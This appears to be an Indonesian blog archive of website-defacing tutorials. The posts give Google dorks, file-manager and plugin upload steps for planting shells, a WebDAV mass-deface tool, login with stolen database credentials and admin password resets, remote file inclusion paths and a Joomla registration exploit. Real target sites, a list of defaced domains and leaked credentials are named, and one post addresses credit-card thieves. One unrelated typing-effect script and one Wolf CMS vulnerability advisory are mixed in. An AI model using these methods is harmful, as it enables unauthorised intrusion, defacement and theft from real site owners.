WHAT'S NEW?
Loading...
Showing posts with label Defacing. Show all posts
Showing posts with label Defacing. Show all posts
Udah lama nggak negpost nih! oke kali ini saya akan meng-share tentang "Deface denga  Remote File Upload. Tutorial ini bisa dibilang sangat mudah! mengapa? karena kita hanya meng-upload Script Deface sobat ke web target. Mungkin presentase kegagalan hanya 5%. Oke gak pake basa-basi langsung liat aja artikel ini!

Tool yang digunakan hanya Google dan otak.

Dork:


inurl:/editor/editor/filemanager/
nurl:/HTMLEditor/editor/"
1. Masukkan dork ke Google

2. Pilih salah satu web yang mau dijadikan target
    Contoh target:  http://www.fmcaminhoneiro.com.br/editor/editor/filemanager/upload/
    Dan tampilannya kurang lebih akan seperti ini.
3. Exploit dengan editor/editor/filemanager/upload/test.html Contohya seperti
   http://www.fmcaminhoneiro.com.br/editor/editor/filemanager/upload/test.html



4. Ganti ASP menjadi PHP

5. Pilih Script Defacemu di Choose File, lalu klik Send It To Server



6. Ingin tahu buktinya kalo sobat udah nge-deface web tsb. Lihat gambar ini!
    Contoh: http://www.fmcaminhoneiro.com.br/editor/images/Pepes(1).html

NB: Kalo gak bisa meng-upload scriptnya, berarti web itu tidak vuln, cari web yang lain

Semoga artikel ini bermanfaat :D
Dah lama gak posting nih blog wkwkw :v
saya mau kasih tutorial depes lagi kali ini CMSnya Wordpress
langsung aja
Dork :
inurl:/wp-content/themes/WPstore /inurl:"/?page=store" site:.com
kita ambil contoh: http://www.pgreports.co.uk/?page=store
nah kalo udah kita ctrl+u :v
kita liat wordpress bukan dan themanya apaa :v


http://www.pgreports.co.uk/wp-content/themes/Store/style.css
kita ganti URLnya menjadi
http://www.pgreports.co.uk/wp-content/themes/Store/upload

kalo begitu ada tombol uploadnya langsung aja pilih shell ente
langsung upload shell ada di direktori
http://www.pgreports.co.uk/wp-content/uploads/products_img/shell.php
(Note: not all website are vulnerable in this exploit)
dah lama gak post sayangnya laptop vga ane rusak jadi maklumi tampilan segede gajah :/
Ok langsung aja pasti dah tau webdav kan ?
kalo blum tau mending google dulu
kalo udah nih ane kasih lagi softwarenya
WebDav Rootkit Hmei7 Download
Langsung cari target yg vuln dengan dork berikut
Dork WebDav : inurl:/Hmei7.asp;.txt site:com
ntar kurang lebih seperti ini gambarnya




Copy URL tersebut dan Paste di
http://www.yougetsignal.com/tools/web-sites-on-web-server/
Untuk mengetahui domain yang 1 server dengan web tersebut
Seperti ini



Found 40 domains hosted on the same web server as file9.bemycio.com (67.40.161.74).Lumayan lah 40 domain iseng-2 berhadiah gan
Langsung Copas smua tuh web di notepad kyk gambar ini
ini main replace pada notepad biar kita mudah/cepat untuk menyusun setiap domain tersebut
Ntar tiggal enter-enter aja kyk gini
< SPASI > di hapus di ganti spasi beneran -_-"

Habis itu Save AS file dengan nama terserahagan.txt
Habis itu buka webdav dan load File yang agan save tadi contoh punya ane x.txt
Habis itu Klik open
Jangan lupa setting yang ada di kanan langsung di Setting biar langsung file .html bukan shell .asp;.txt lagi
nih contoh langsung ane klik SERANG !!

Lihat Hampir smua domain ke Hack dalam 1 server tersebut hehe
nih hasilnya
"http://file9.bemycio.com/dot.html"
"http://1.bemycio.com/dot.html"
"http://11010.gov.iatgroup.com/dot.html"
"http://1265.iatgroup.com/dot.html"
"http://171.mrkfs.com/dot.html"
"http://2234.iatgroup.com/dot.html"
"http://2890.bemycio.com/dot.html"
"http://2900.bemycio.com/dot.html"
"http://341.bemycio.com/dot.html"
"http://adele.iatgroup.com/dot.html"
"http://bemycio.com/dot.html"
"http://edanku.bemycio.com/dot.html"
"http://erdem.gov.mrkfs.com/dot.html"
"http://file9.bemycio.com/dot.html"
"http://g.mrkfs.com/dot.html"
"http://gov.mrkfs.com/dot.html"
"http://hjjk.bemycio.com/dot.html"
"http://iatgroup.com/dot.html"
"http://ice544.bemycio.com/dot.html"
"http://lol.gov.mrkfs.com/dot.html"
"http://microsoft.mrkfs.com/dot.html"
"http://mrkfs.com/dot.html"
"http://nnnn.bemycio.com/dot.html"
"http://norx.iatgroup.com/dot.html"
"http://pctcinc.netpnk.ac.bemycio.com/dot.html"
"http://post39.com/dot.html"
"http://root.gov.bemycio.com/dot.html"
"http://spesial.gov.iatgroup.com/dot.html"
"http://tolol.bemycio.com/dot.html"
"http://www.2900.bemycio.com/dot.html"
"http://www.iatgroup.com/dot.html"
"http://www.lol.gov.mrkfs.com/dot.html"
"http://www.mrkfs.com/dot.html"
"http://www.passs.bemycio.com/dot.html"
thx udah mampir gan di tunggu tutorial dari newbie selanjutnya ;)
Kalo ada yang bilang WebDav bisa embat index jangan percaya gan paling dia kasih index.html
wkwkw kalo beneran index dia langsung
misalnya site.com < langsung ke hack bukan gini
site.com/index.html < ini mah bukan index cuma nama file doang yg index -__-"
ya udah sekian :*
Greetz All Indonesian Defacer

Thank's to http://tutorial-update.blogspot.com
Cara Membuat Efek Tulisan Berjalan Seperti Diketik
Enaknya ngeblog di blogspot adalah bisa mencoba berbagai trik blog, baik untuk mengoptimalkan blog ataupun memperindah tampilan blog. Dalam sebuah blog yang biasa paling dominan adalah teks atau tulisan. Ada beragam cara membuat efek-efek pada tulisan, mulai dari tulisan berkedip, Membuat Link Bergoyang, sampai yang akan kita pelajari hari ini yaitu membuat tulisan berjalan seperti diketik.

Tulisan dengan efek berjalan seperti diketik, sama seperti sama seperti saat kita mengetik pakai laptop. Saat jari kita menekan huruf, maka akan muncul huruf dan seterusnya. Efek ini membuat tulisan tampil huruf per huruf. Efek ini bisa dipakai untuk memikat mata pengunjung agar melihatnya, misalnya sebuah pengumuman. Untuk membuat tulisan dengan efek seperti diketik cukup mudah. Kita tinggal menyalin script berikut ini:

<script language="JavaScript">
var text="Selamat Datang di Blog Saya, Jangan Lupa Baca & Komentar!";
var delay=20;
var currentChar=1;
var destination="[none]";
function type()
{
//if (document.all)
{
var dest=document.getElementById(destination);
if (dest)// && dest.innerHTML)
{
dest.innerHTML=text.substr(0, currentChar)+"<blink>_</blink>";
currentChar++;
if (currentChar>text.length)
{
currentChar=1;
setTimeout("type()", 5000);
}
else
{
setTimeout("type()", delay);
}
}
}
}
function startTyping(textParam, delayParam, destinationParam)
{
text=textParam;
delay=delayParam;
currentChar=1;
destination=destinationParam;
type();
}
</script> <b><div 0px="" 12px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none;"></div></b> <script language="JavaScript">
javascript:startTyping(text, 50, "textDestination");
</script>

Script di atas bisa dipasang di post dan juga di sidebar. Untuk di postingan, masukan dengan opsi HTML saat menulis. Sedangkan untuk sebagai widget bisa dengan saat di tata letak, pilih tambakan gadget dan pilih HTML/Java Script. Ganti tulisan yang berwarna merah dengan teks yang kamu inginkan, contohnya akan tampil seperti ini:


Selamat Datang di Blog Saya, Jangan Lupa Baca & Komentar!_

Jika membahas cara membuat efek tulisan seperti diketik ini jadi teringat dengan pelajaran terdahulu, yaitu membuat news tiker dari recent post blog. Karena efek yang ditampilkan sama, yaitu seperti diketik. Sudahkah kamu mencoba?
ini deface dengan config Bukan mencari config :)

Assalamualaikum Wr.Wb
Kali ini saya mau berbagi tutorial buat kalian yang masih belum mengerti bagaimana cara menggunakan config dan mysql ( sebenarnya saya juga masih belajar ) . Langsung aja disimak langkah - langkahnya .

Pertama siapkan dulu config dan mysql . Sebagai contoh saya menggunakan config dan mysql dari om Gabby ( Config : http://ecovox.com.br/images/image/ MySQL :http://ecovox.com.br/images/sql.php ) . Jika sudah punya silahkan anda klik config dan mysql anda ( bisa juga menggunakan punya om gabby ) . Jika sudah terbuka kalian klik tab Confignya dan pilih salah satu config .

[Image: confiq.png]

Jika sudah kita akan masuk kehalaman data dari config itu . Dan kita akan mengambil Username + Password + Hostname untuk login di mysql nanti .

[Image: confiq.png]

Sebagai contoh kita mendapatkan ( Username : alugueum_wp158 - Password : Sikx511e3P - Hostname :

bm22.webservidor.net ) . Jika kita sudah mendapatkannya saatnya kita contoh

untuk login di Mysql .Contoh MySQL ( http://ecovox.com.br/images/sql.php ) contoh

kita buka MySQL kita untuk mencoba login .

[Image: confiq.png]


Jika sudah memasukan semua data yang dibutuhkan sekarang login dengan data yang kita dapatkan tadi . Jika login kita berhasil maka kita akan memasuki halaman Database . JIka sudah memasuki halaman database kita klik tulisan Tables pada tabel ke-2 ( alugueum_xr00tz ) .


[Image: confiq.png]

Jika sudah masuk ke Database ( alugueum_xr00tz ) kita perlu mencari Halaman Websitenya ( didalam contoh halaman website terdapat pada ( wp_options , dan biasanya halaman website diletakkan pada data yang bersangkutan dengan _option ) . Jika sudah kita klik Data untuk melihat data yang ada didalamnya . Jika sudah di klik kita cari tulisan siteurl ( dan disampingnya terdapat halaman website , http://rizki.la) jika sudah ketemu kita lihat halaman websitenya ( http://rizki.la) . 

[Image: confiq.png]

[Image: confiq.png]

Langkah selanjutnya kita back untuk mengganti password di kolom wp_users ( tidak selamanya terdapat pada wp_users , sebenarnya bisa saja yang berkaitan dengan users . Jika sudah back kita buka Datanya dengan cara klik Data pada kolom wp_users . Jika sudah klik Data maka anda akan masuk ke Database dari wp_users tadi dan saatnya anda untuk mengedit password databasenya dengan mengklik tulisan edit di kolom database tersebut .

[Image: confiq.png]

Jika sudah di klik maka kita akan masuk ke halaman data - data yang bisa untuk di edit ( sebagai keperluan yang kita edit cukup passwordnya saja / password harus sudah di encrypt dengan MD5 jika belum tau cara encrypt masuk ke web ini http://md5encryption.com dan encrypt tulisan anda contohnya : black = 1ffd9e753c8054cc61456ac7fac1ac89 ) . Jika sudah selesai mengencrypt dengan MD5 saatnya untuk mengganti passwordnya dengan MD5 anda . Jika sudah selesai menggantinya kita klik tombol Edit Data .

[Image: confiq.png]

Sekarang tinggal anda cari Halaman Loginnya dan masukan data - data yang diperlukan . Selamat Mencoba >xr00tz<[/i]
Hallo Guys ,
Kaliini saya akan share Cara Membuat Script yaitu Background . Saya akaan mengajarkan agan" yang belum mengerti cara membuat script buat Deface . Oke
>> Cekidot

Bahan
• Notepad
• Internet

Langkah
1. Open Notepad
2. Copy Code Berikut
Copy Code Berikut diantara <body> </body>


<body background="http://i1079.photobucket.com/albums/w515/raafi_teja/bcmmn0k4axvw.gif">
Demo : TKP >> CEKIDOT


<body background="http://i1079.photobucket.com/albums/w515/raafi_teja/matrixright.gif">
Demo : TKP >> CEKIDOT


<body background="http://i1079.photobucket.com/albums/w515/raafi_teja/matrixrandom.gif">
Demo : TKP >> CEKIDOT



Selamat Mencoba, Semoga Post ini dapat membatu dan Bermanfaat .

  Surabaya Blackhat and Hacking For Live - Oke ,kali ini saya akan mengshare tutorial 'Cara Agar Script Deface Tidak Bisa Dicuri'.Leet's begin .....

  Kebanyakan dari temen - temen ngga' pengen scriptnya di curi kan ? o.O .Makanya simak tutor berikut ,heheh :D.

  Caranya gampang ,sobat tinggal klik Link <- Lalu ,masukan script HTML ke kolom yang ada di number 3.Dan pilih code key terserah anda.

  Gotcha !!! ,Script HTML pun jadi Java Script .Sekian tutor dari saya kali ini... ,

Semoga Bermanfaat !
Wolf CMS is a content management system and is Free Software published
under the GNU General
Public License v3. Wolf CMS is written in the PHP programming language.
Wolf CMS is a fork of Frog CMS.
The project was a finalistin the 2010 Packt Publishing s Open Source awards
for the Most Promising
Open Source Project category. As of the 28th of December 2010, the Wolf CMS
code repository was moved
from Google Code to Github.
( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS )
Abstract:
=========
Vulnerability Laboratory Research Team discovered multiple Web
Vulnerabilities on the Wolf Content Management System v0.7.5
Report-Timeline:
================
2012-02-11: Vendor Notification
2012-02-27: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
BlueWin CH
Product: Wolf CMS v0.7.5
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
1.1
A SQL Injection vulnerability is detected on the Wolfs Content Management
System v0.7.5. The
vulnerability allows an remote attacker to execute own sql commands on the
affected application
dbms. Successful exploitation can result in dbms, web-server or application
compromise.
Vulnerable Module(s):
[+] /plugins/comment/[Index]
Picture(s):
../1.png
1.2
Multiple persistent vulnerabilities are detected on the Wolfs Content
Management System v0.7.5.
The bug allows an remote attacker or local low privileged user account to
inject persistent malicious
script code on application side. Successful exploitation can result in
persistent context manipulation
on requests, session hijacking & account steal via application side
phishing.
Vulnerable Module(s):
[+] /plugins/comment/
Picture(s):
../2.png
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers & local low
privileged user accounts with- and
without required user inter action. For demonstration or reproduce ...
1.1
Path: /wolfcms/wolf/plugins/comment/
File: index.php
Review:
271: $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ?
$_SERVER['HTTP_X_FORWARDED_FOR']:($_SERVER['REMOTE_ADDR']);
1.2
Path: /wolfcms/wolf/plugins/comment/
File: index.php
Review:
/wolfcms/wolf/plugins/comment/index.php
272: echo '<input type="hidden" value="'.$ip.'" name="comment[author_ip]"
/>';
Risk:
=====
1.1
The security risk of the blind sql injection vulnerabilities are estimated
as high(+).
1.2
The security risk of the persistant xss vulnerabilities are estimated as
medium(+).
Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright � 2012|Vulnerability-Lab
langsung aja share sedikit cara upload shell via plugin 

1. rubah/jadikan shell anda ke dalam bentuk file .zip
http://prntscr.com/oq3l8

2. login ke dalam web yang akan di colikan -_-


3. setelah masuk, go to plugin ---> add new
http://prntscr.com/oq431

4. klik tab upload
 http://prntscr.com/oq495

5. Upload shel yang sudah dijadikan .zip tadi
setelah selesai, pasti akan seperti ini


6. shell sudah di upload. cara memanggilnya dengan cara memainkan url

http://www.site.com/wp-content/upgrade/namafile(nama file .zipnya)/isifile.php

MISAL NAMA FILE .zip NYA "coli.zip" maka commandnya
http://www.site.com/wp-content/upgrade/hacker/hacker.php

hasil
http://prntscr.com/oq6l8

SEMOGA TUTOR INI BERMANFAAT
Tadinya ane agak susah upload backdoor di joomla,pas mikir” baru inget ada temen yg pernah make cara ini. Ok deh langsung Praktek aja :


2. Upload Plugins yg tadi, Cara’y ente Liat Extensions trs klik Install/Uninstall disitu ada tombol Upload Nahh..Silahkan upload Plugins’y. tunggu beberapa saat sampe install Plugins selesai

3. OK…klo dah selesai Upload Plugins and selesai install, selanjut’y arahkan mouse ke Tab Components. Nah udah ke install kan Plugins yg tadi kita Upload, Selanjut’y masuk ke directory Plugins NinjaXplorer Tampilan’y seperti ini :


4. Selesai Upload Backdoor, nanti backdoor kita berada di :
http://www.target.com/news/backdoor.php  atau  http://www.target.com/backdoor.php
Buat para carder di dunia, memang sulit mencari card credit untuk saat ini, tapi masih banyak exploit yang masih dapat anda gunakan untuk mencari itu semua, seperti teman teman code security yang masih mencari dan menggila masalah credit card dan paypal.

Lalu seperti apa exploitnya? mungkin beberapa waktu lalu sangat banyak orang mencari oscommerce, sering saya mendapatkan web yang Vulnerability dengan exploit lama. 

Langusng aja biar teman teman dapat mencoba dengan exploit buat para carder di mana saja.


#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php


# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
 

#Demo : 

  1. http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# 
  2. http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.

dorknya :
inurl:”spaw2/dialogs/” OR  inurl:”spaw2/uploads/files/” 

Jika sudah dapat targetny, contoh targetnya :

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN 

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI
  • Akan tampil halaman untuk upload File.
  • Ganti menjadi files pada lokasi penyimpanan.
  • Browse file design Deface kamu, & upload.
  • Apabila file sukses diupload.akan terlihat file uploadtan tadi…
Cara Mudah Deface Remote File Include, Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita.
  • cd namadirectory = Melihat Suatu directory
  • ls -al = Melihat Suatu Directory Lebih Dalam lagi
  • find = Mengecek Directory directory
  • cat = Membaca Suatu Berkas
  • wget = MengUpload suatu Files
  • tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
  • pwd = Mengetahui Di Directory mana Kita Berada
  • uname -a = Keberadaan Path berada
  • w = Mengetahui Siapa Saja yang telah menggunakan Shell.
  • curl = mendownload url
  • [EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Site Oneadmin RFI
atau cari RFI di exploit db atau web penyedia exploit lain. Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com, lalu sekarang saya kasi contoh pathnya :
http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki.
nah sekarang saya kasi contoh pathnya:
http://target.com/modules/PNphpBB2/include/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka. sekarang saya kasi contoh pathnya
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : …
http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
nah sekarang tinggal upload file html/php defacesan kita ke direktoryinya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha

mereka yang berhasil adalah orang yang berusaha untuk tujuannya
oke pertama - tama kita kumpulkan bahanya dulu ..,
Exploit Joomla | Com_user  view source | Dowload
Dork: 
inurl:/index.php/login intext:Joomla! site:.com
inurl:/index.php/login site .com
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. site:.uk
intitle:Don't Have Account ? site:.com
intitle:Login- site.com
inurl:itemid= site:uk
inurl:itemid= site:com
inurl:itemid= site:id
inurl:itemid= site:nl
inurl:itemid= site:ck
inurl:itemid= site:jp
inurl:itemid= site:it
intext:Joomla 1.7

inurl:index.php/19-sample-data-articles/ joomla site:it
Monggo dipilih 1 aja :)
Dork dikembangin sendiri okeh :)
Exploit: index.php?option=com_users&view=registration
Shell (jika perlu)
Scanner web vuln COM_USER :
Ciri - ciri web vuln COM_USER :

ciri - ciri berikut berdasarkan garis bawah., yang hampir dekat dengan garis footer.,
berarti webtadi vuln..,
Update: Garis bawah lebih jauh dari garis footer normalnya., itu dianggap vuln juga ^^
contoh gambar :
Cara Memakai :
1.Pertama - tama kita buka link  berikut
   dan kita copy file tadi ke notepad., lalu kita simpan dalam format .html
   cara simpan ke file html., klik save > pilih allfiles > beri nama "ExploitJoomla.html"
   seperti gambar dibawah ini :
   lebih gampangnya anda dowload  exploit joomla nya disini
 
 
buka https://www.google.com/ atau https://www.google.co.id
   kita search dengan dork tadi., dan saya mengambil salah satunya :)
   misalnya : inurl:/index.php/login intext:Joomla! site:.com 
    seperti gambar dibawah ini
2.Kalau sudah ketemu (targetnya) biar lebih singkatnya
   misal target ane www.aspie.org.uk


3.kita exploit tin target tadi dengan menambahkan
   index.php?option=com_users&view=registration
   
atau /index.php/login?view=registration
    hasil seperti ini:
   www.aspie.org.uk/index.php/login?view=registration
   
atau anda bisa lihat gambar dibawah
 
4. Kalau udh tekan ctrl + u  atau klik kanan > view - source (yang ada di google chrome)
5.Habis itu tekan ctrl + f
   atau anda bisa klik kanan > pilih find
   masukkan kode ini "hidden" ., pilih yang bawah sendiri atau cari seperti kode berikut.,
   lihat gambar dibawah
6. Copy kode tadi ke exploit joomla.html yang udh kalian dowload tadi.,
    cara membuka file exploit joomla.html ke notepad  :
     Klik kanan Exploit Joomla.html > Pilih open with > pilih Notepad
     copy kan urlsite seperti yang saya tandai di gambar
      #note:silahkan ganti username., email.,
      Setelah itu klik FIle > save
       atau tekan tombol ctrl + s

7. buka file Exploit Joomla.html (double click file Exploit Joomla.html
     lalu klik "register"

8. lalu di site register tadi, akan muncul peringatan berupa " You passwords entered do not macth.
    Please enter you desired password in the password field and confirm you entry by entering
    it in the confirm" yang artinya anda disuruh memasukkan password yang sama., untuk
   melanjutkan ke step selanjutnya., dan masukkan password mu di kolom password dan
   confirm password., dan klik tombol register.,
    seperti gambar dibawah ini


9.  nanti akan ada peringatan berupa., registrasi berhasil., "sebelum login anda harus mengaktif
      kan user lewat email "
      setelah itu., check email anda., akan ada email dari web tadi.,
      dan buka email tadi .,
     #NB : liat email bisa di kotak pembaruan., kotak utama ., dan kotak spam
     letak kotak spam ada di ., Tab selengkapnya > spam > daftar email spam
10. kita buka email masuk dari web tadi., kita buka link konfirmasinya
      seperti yang saya tandai di gambar berikut
11.Kalo udh selesai akan ada peringatan sebagai berikut
    "Your account has been succesfully activated.You can now log in using the username
       and password you choose during registrasion" berarti registry anda berhasil.!
      dan anda disuruh untuk mengambil confirmasi email nya
      contoh gambar
12. Setelah itu., ke admin loginnya
      contoh admin login joomla (defaultnya) : /administrator  .,  /admin
      sebagai contoh www.aspie.org.uk/administrator
      dan akan kebuka form login admin joomla.,
      mari kita login..,
      user : yazid
      pass : bustomi
     Klik tombol "log in"
 13. Taraaaaaaaaaaaaaaaaaaaaaaaaaaaa., kita masuk admin loginnya ^_^
       tinggal tebas index aja tuh :)
       trus gimana tebas indexnya ?
       use your brain okeh :)
      NB : Kalo ga berhasil ke login admin berarti web tadi udh ga vuln (udh dipacth )


Semoga Bermanfaar :)